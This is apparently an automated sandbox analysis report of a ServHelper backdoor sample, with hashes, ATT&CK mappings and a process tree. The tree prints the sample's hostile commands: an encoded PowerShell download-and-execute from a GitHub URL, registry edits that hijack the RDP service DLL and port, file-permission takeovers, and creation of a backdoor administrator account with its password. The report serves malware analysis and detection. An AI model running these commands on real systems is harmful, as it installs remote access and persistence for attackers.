servhelper | be9c5e5ce6d4544e6bddbd47c26873fe0c33414086824b1d4968a638184a8a7c

Analysis

max time kernel
128s
max time network
122s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
11-03-2024 04:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bfe0ac25eeeb759f7c8e06229c7313a2.exe
Size

5.9MB
MD5

bfe0ac25eeeb759f7c8e06229c7313a2
SHA1

199c1fbd29f9ec98b83464763dac63ef80998bb3
SHA256

be9c5e5ce6d4544e6bddbd47c26873fe0c33414086824b1d4968a638184a8a7c
SHA512

a0f3b477de1603d7e032608692857a4865059ba61ae1276334f281970a1484a6c81463fba2a2bbc9821c016e06e206d621fdb97e8743fc60e3515fba88997a72
SSDEEP

49152:tvGIuxrb/TkvO90dL3BmAFd4A64nsfJ1XU59mMJETIR1iVhYOxbJBKqKhmYYMNn9:tvGfXdmAQQQQQQQQQQQQQ

Score

10^/10

servhelper backdoor discovery exploit persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 2 IoCs

flow	pid	Process
7	796	powershell.exe
8	796	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001

Possible privilege escalation attempt 8 IoCs

exploit

pid	Process
2252	icacls.exe
1900	takeown.exe
2220	icacls.exe
1520	icacls.exe
1412	icacls.exe
612	icacls.exe
1708	icacls.exe
900	icacls.exe

Sets DLL path for service in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Loads dropped DLL 2 IoCs

pid	Process
892	Process not Found
892	Process not Found

Modifies file permissions 1 TTPs 8 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
1708	icacls.exe
900	icacls.exe
2252	icacls.exe
1900	takeown.exe
2220	icacls.exe
1520	icacls.exe
1412	icacls.exe
612	icacls.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000b000000016bee-106.dat	upx
behavioral1/files/0x0008000000016c10-107.dat	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
6	raw.githubusercontent.com
7	raw.githubusercontent.com
8	raw.githubusercontent.com

Drops file in System32 directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Windows directory 9 IoCs

description	ioc	Process
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\O125OXXRN1PUOHOVX953.temp	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1884	WMIC.exe

Modifies data under HKEY_USERS 4 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = d0365ef06e73da01	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
1028	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
2888	powershell.exe
2368	powershell.exe
2588	powershell.exe
2192	powershell.exe
2888	powershell.exe
2888	powershell.exe
2888	powershell.exe
796	powershell.exe

Suspicious behavior: LoadsDriver 5 IoCs

pid	Process
464	Process not Found
892	Process not Found
892	Process not Found
892	Process not Found
892	Process not Found

Suspicious use of AdjustPrivilegeToken 19 IoCs

description	pid	Process
Token: SeDebugPrivilege	3060	bfe0ac25eeeb759f7c8e06229c7313a2.exe
Token: SeDebugPrivilege	2888	powershell.exe
Token: SeDebugPrivilege	2368	powershell.exe
Token: SeDebugPrivilege	2588	powershell.exe
Token: SeDebugPrivilege	2192	powershell.exe
Token: SeRestorePrivilege	1520	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	1884	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1884	WMIC.exe
Token: SeAuditPrivilege	1884	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	1884	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1884	WMIC.exe
Token: SeAuditPrivilege	1884	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2448	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2448	WMIC.exe
Token: SeAuditPrivilege	2448	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2448	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2448	WMIC.exe
Token: SeAuditPrivilege	2448	WMIC.exe
Token: SeDebugPrivilege	796	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3060 wrote to memory of 2888	3060	bfe0ac25eeeb759f7c8e06229c7313a2.exe	29
PID 3060 wrote to memory of 2888	3060	bfe0ac25eeeb759f7c8e06229c7313a2.exe	29
PID 3060 wrote to memory of 2888	3060	bfe0ac25eeeb759f7c8e06229c7313a2.exe	29
PID 2888 wrote to memory of 2448	2888	powershell.exe	31
PID 2888 wrote to memory of 2448	2888	powershell.exe	31
PID 2888 wrote to memory of 2448	2888	powershell.exe	31
PID 2448 wrote to memory of 2424	2448	csc.exe	32
PID 2448 wrote to memory of 2424	2448	csc.exe	32
PID 2448 wrote to memory of 2424	2448	csc.exe	32
PID 2888 wrote to memory of 2368	2888	powershell.exe	33
PID 2888 wrote to memory of 2368	2888	powershell.exe	33
PID 2888 wrote to memory of 2368	2888	powershell.exe	33
PID 2888 wrote to memory of 2588	2888	powershell.exe	35
PID 2888 wrote to memory of 2588	2888	powershell.exe	35
PID 2888 wrote to memory of 2588	2888	powershell.exe	35
PID 2888 wrote to memory of 2192	2888	powershell.exe	37
PID 2888 wrote to memory of 2192	2888	powershell.exe	37
PID 2888 wrote to memory of 2192	2888	powershell.exe	37
PID 2888 wrote to memory of 1900	2888	powershell.exe	41
PID 2888 wrote to memory of 1900	2888	powershell.exe	41
PID 2888 wrote to memory of 1900	2888	powershell.exe	41
PID 2888 wrote to memory of 2220	2888	powershell.exe	42
PID 2888 wrote to memory of 2220	2888	powershell.exe	42
PID 2888 wrote to memory of 2220	2888	powershell.exe	42
PID 2888 wrote to memory of 1520	2888	powershell.exe	43
PID 2888 wrote to memory of 1520	2888	powershell.exe	43
PID 2888 wrote to memory of 1520	2888	powershell.exe	43
PID 2888 wrote to memory of 1412	2888	powershell.exe	44
PID 2888 wrote to memory of 1412	2888	powershell.exe	44
PID 2888 wrote to memory of 1412	2888	powershell.exe	44
PID 2888 wrote to memory of 612	2888	powershell.exe	45
PID 2888 wrote to memory of 612	2888	powershell.exe	45
PID 2888 wrote to memory of 612	2888	powershell.exe	45
PID 2888 wrote to memory of 1708	2888	powershell.exe	46
PID 2888 wrote to memory of 1708	2888	powershell.exe	46
PID 2888 wrote to memory of 1708	2888	powershell.exe	46
PID 2888 wrote to memory of 900	2888	powershell.exe	47
PID 2888 wrote to memory of 900	2888	powershell.exe	47
PID 2888 wrote to memory of 900	2888	powershell.exe	47
PID 2888 wrote to memory of 2252	2888	powershell.exe	48
PID 2888 wrote to memory of 2252	2888	powershell.exe	48
PID 2888 wrote to memory of 2252	2888	powershell.exe	48
PID 2888 wrote to memory of 2756	2888	powershell.exe	49
PID 2888 wrote to memory of 2756	2888	powershell.exe	49
PID 2888 wrote to memory of 2756	2888	powershell.exe	49
PID 2888 wrote to memory of 1028	2888	powershell.exe	50
PID 2888 wrote to memory of 1028	2888	powershell.exe	50
PID 2888 wrote to memory of 1028	2888	powershell.exe	50
PID 2888 wrote to memory of 1440	2888	powershell.exe	51
PID 2888 wrote to memory of 1440	2888	powershell.exe	51
PID 2888 wrote to memory of 1440	2888	powershell.exe	51
PID 2888 wrote to memory of 2292	2888	powershell.exe	52
PID 2888 wrote to memory of 2292	2888	powershell.exe	52
PID 2888 wrote to memory of 2292	2888	powershell.exe	52
PID 2292 wrote to memory of 756	2292	net.exe	53
PID 2292 wrote to memory of 756	2292	net.exe	53
PID 2292 wrote to memory of 756	2292	net.exe	53
PID 2888 wrote to memory of 1916	2888	powershell.exe	54
PID 2888 wrote to memory of 1916	2888	powershell.exe	54
PID 2888 wrote to memory of 1916	2888	powershell.exe	54
PID 1916 wrote to memory of 1560	1916	cmd.exe	55
PID 1916 wrote to memory of 1560	1916	cmd.exe	55
PID 1916 wrote to memory of 1560	1916	cmd.exe	55
PID 1560 wrote to memory of 1672	1560	cmd.exe	56

C:\Users\Admin\AppData\Local\Temp\bfe0ac25eeeb759f7c8e06229c7313a2.exe
"C:\Users\Admin\AppData\Local\Temp\bfe0ac25eeeb759f7c8e06229c7313a2.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3060
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2888
- - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\iihicsuo.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2448
  - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7E74.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC7E73.tmp"
      4⤵
      PID:2424
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2368
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2588
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2192
- - C:\Windows\system32\takeown.exe
    "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1900
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2220
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1520
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1412
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:612
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1708
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:900
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2252
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:2756
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Sets DLL path for service in the registry
    - Modifies registry key
    PID:1028
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:1440
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2292
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:756
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1916
  - - C:\Windows\system32\cmd.exe
      cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1560
    - - C:\Windows\system32\net.exe
        
        net start rdpdr
        5⤵
        
        PID:1672
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
        PID:276
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    PID:2236
  - - C:\Windows\system32\cmd.exe
      cmd /c net start TermService
      4⤵
      PID:1952
    - - C:\Windows\system32\net.exe
        
        net start TermService
        5⤵
        
        PID:2460
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:1964
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:572
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:2812

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
PID:2264
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 000000 /del
  2⤵
  PID:2180
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
    3⤵
    PID:2348

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc qb9VvZLt /add
1⤵
PID:1448
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc qb9VvZLt /add
  2⤵
  PID:2256
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc qb9VvZLt /add
    3⤵
    PID:1664

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
PID:540
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  2⤵
  PID:884
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    3⤵
    PID:3024

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" IKJSPGIM$ /ADD
1⤵
PID:2864
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" IKJSPGIM$ /ADD
  2⤵
  PID:1596
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" IKJSPGIM$ /ADD
    3⤵
    PID:1600

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:2576
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  2⤵
  PID:3028
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
    3⤵
    PID:1116

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc qb9VvZLt
1⤵
PID:2196
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc qb9VvZLt
  2⤵
  PID:2648
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc qb9VvZLt
    3⤵
    PID:2728

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:1648
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1884

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:2444
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2448

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:2664
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:548
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:796

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES7E74.tmp

Filesize
1KB

MD5
cebbeb19d08ba47b1b180d15705711cc

SHA1
017f53374c76018187c12b330a4b947dc512f1e3

SHA256
18f71d21fcdfb2bba74ea9dea77b0aabaec207d1cd79e1fe0a31cfdd42b026e3

SHA512
173e8335c0ad36444646c07fde0b0192dfa3084292eb77e3e8ca828ce576a1ad2592dc255685893a88668d2ae7ea096aaa8b7160c51f4e958ce7c7c6975cdcd1

Download Submit
C:\Users\Admin\AppData\Local\Temp\iihicsuo.dll

Filesize
3KB

MD5
50659be73ef6f93b2e1e47c44f08df7c

SHA1
eaaf51c762da141aa0fa53259cd8515e967413d3

SHA256
f55c1f1a26440ed6e45c9fc5d2cf1c355001e9c9fb89cb963dedcb9fac41c9f7

SHA512
2f08ed848ca5ee1adf490a8cf5471f0819e98c0a73fce3819b800ce281b82c8b821cd68ae3b917597f69865fa2bdc10c5a86086d202ab0259cafc3dfd3036a03

Download Submit
C:\Users\Admin\AppData\Local\Temp\iihicsuo.pdb

Filesize
7KB

MD5
35a1844722bf849b1d316026b43d4c18

SHA1
151e4fa6dc78621b30d963407dd475b4ff6e6b43

SHA256
418865b4eb1ae925c7ad16846cb824c5adbf029366e302627e3161555ed7d984

SHA512
ee8ea5f7507b38e36dc92c2724739eef82db7dc605ae17d0c252d0941b3a207c261bf2bb77c00d453382bb0f1ded0cd71a3ff27fdfdb1f2de7b578473032dbc3

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1

Filesize
1KB

MD5
3447df88de7128bdc34942334b2fab98

SHA1
519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb

SHA256
9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9

SHA512
2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

Download Submit
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1

Filesize
2.5MB

MD5
6938a2a0fa3adc1ab9cc3bb479ff0e74

SHA1
37e2117cf83cdf1a631a394ce6f0c57f70ee3f47

SHA256
df16833eb7975ca070466bf2f655e078508a59968d8f50f14a8ff7873008d068

SHA512
5509bae8342bfc482a671258fe3012247f89b2449e84f6c42a4dd0bc73cd4177fff6d581c3615214fc0b5f115a77e24213c5dd37f8c0631eb9064349c33eec79

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
c79e36dff5d1f64ce2373c4459ecf6c8

SHA1
07ff03804e58d301a9c09088513f29141d0a792f

SHA256
065a5df7babcf4b4e905e8c7e212b3aeb323192090a41ea17a8acc8833bbf63f

SHA512
09f0e10acde4b4b215dfb478dcc50fa28c229ff923e0d29acb50d37501a704f8ddd35d4b5c9cb04ca564e5e08f23790cdc7af39d54e02ddf3afe3cd6f278062c

Download Submit
C:\Windows\system32\rfxvmt.dll

Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC7E73.tmp

Filesize
652B

MD5
ea155bb22a0156fae79dce90c5a27709

SHA1
134239ed3c3ab0326362420a4f658706771396b0

SHA256
62bda91456dbe81607ca161c8a51dd7f32403ef10b30144538a0f1d829dc6455

SHA512
68c796ff17f4d95a44ff4c9d01525f7ec35935c2dbeae118bcac62daf8d9f20bd393ceefc321569de3da026288ec89493ab5e8d7ef962cfbbb98608e5554ca07

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\iihicsuo.0.cs

Filesize
424B

MD5
4864fc038c0b4d61f508d402317c6e9a

SHA1
72171db3eea76ecff3f7f173b0de0d277b0fede7

SHA256
0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84

SHA512
9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\iihicsuo.cmdline

Filesize
309B

MD5
15bd7405b124a3f4c67bd94c06ae8a2c

SHA1
9aa0453180a998c98a31730d860b7bdd2c380efb

SHA256
f3fe138ce12127f583ab8a4217fb614d8fe4bb15c601c7ae27507941febfcdcd

SHA512
54739ef4063a3399a62a333c77ff3cc20df37333adab99315f99f44a162373ebf72edf6d331981c4775a761b9b80eca7105ec494320037aaec9966d0cfd6c304

Download Submit
\Windows\Branding\mediasrv.png

Filesize
60KB

MD5
70d1bf1c7a95f0613358ac07bc3864ad

SHA1
52783a6ace472471ad68b602c604e48340737596

SHA256
88e639c34e7798f2e51a121db7e0dedc7c5f4bfa95963bb5c93bcb221e0127c3

SHA512
ed5e46ee00e735ca09c5cf4dfed311a4229ff08e9d626c1afa2ed6cc7543f8808259f9553666844ebf25d775b20af0a9bafe59c3b525a6918db1e8c7f70e4fb5

Download Submit
\Windows\Branding\mediasvc.png

Filesize
743KB

MD5
58b4c6a70f55d70a401015da300261b2

SHA1
a13b8a1a577c3638c311f5e668b61cea8a532d35

SHA256
9eaa1a087f7aaa768134c540941584fdc2cd8d050b375a36ded9d1cdf7fb7fe0

SHA512
0ae4aaf9f6383b752b824f86e9ae10983e9f00df9868efa3a1c5e1f2bfae062e43458260c7a379b7d6f711f4ef6a6f22035cc4cd21d7ba1b3c7a5e10f8f06289

Download Submit
memory/796-113-0x000007FEEDBD0000-0x000007FEEE56D000-memory.dmp

Filesize
9.6MB

Download
memory/796-114-0x0000000001210000-0x0000000001290000-memory.dmp

Filesize
512KB

Download
memory/796-115-0x000007FEEDBD0000-0x000007FEEE56D000-memory.dmp

Filesize
9.6MB

Download
memory/796-116-0x0000000001210000-0x0000000001290000-memory.dmp

Filesize
512KB

Download
memory/796-117-0x0000000001210000-0x0000000001290000-memory.dmp

Filesize
512KB

Download
memory/796-118-0x0000000001210000-0x0000000001290000-memory.dmp

Filesize
512KB

Download
memory/796-119-0x000007FEEDBD0000-0x000007FEEE56D000-memory.dmp

Filesize
9.6MB

Download
memory/2192-84-0x000007FEEDBD0000-0x000007FEEE56D000-memory.dmp

Filesize
9.6MB

Download
memory/2192-77-0x0000000002940000-0x00000000029C0000-memory.dmp

Filesize
512KB

Download
memory/2192-76-0x000007FEEDBD0000-0x000007FEEE56D000-memory.dmp

Filesize
9.6MB

Download
memory/2192-82-0x000000000294C000-0x00000000029B3000-memory.dmp

Filesize
412KB

Download
memory/2192-81-0x0000000002940000-0x00000000029C0000-memory.dmp

Filesize
512KB

Download
memory/2192-80-0x0000000002940000-0x00000000029C0000-memory.dmp

Filesize
512KB

Download
memory/2192-79-0x000007FEEDBD0000-0x000007FEEE56D000-memory.dmp

Filesize
9.6MB

Download
memory/2368-54-0x0000000002640000-0x00000000026C0000-memory.dmp

Filesize
512KB

Download
memory/2368-48-0x000007FEEDBD0000-0x000007FEEE56D000-memory.dmp

Filesize
9.6MB

Download
memory/2368-49-0x0000000002640000-0x00000000026C0000-memory.dmp

Filesize
512KB

Download
memory/2368-50-0x000007FEEDBD0000-0x000007FEEE56D000-memory.dmp

Filesize
9.6MB

Download
memory/2368-51-0x0000000002640000-0x00000000026C0000-memory.dmp

Filesize
512KB

Download
memory/2368-55-0x000007FEEDBD0000-0x000007FEEE56D000-memory.dmp

Filesize
9.6MB

Download
memory/2368-53-0x0000000002640000-0x00000000026C0000-memory.dmp

Filesize
512KB

Download
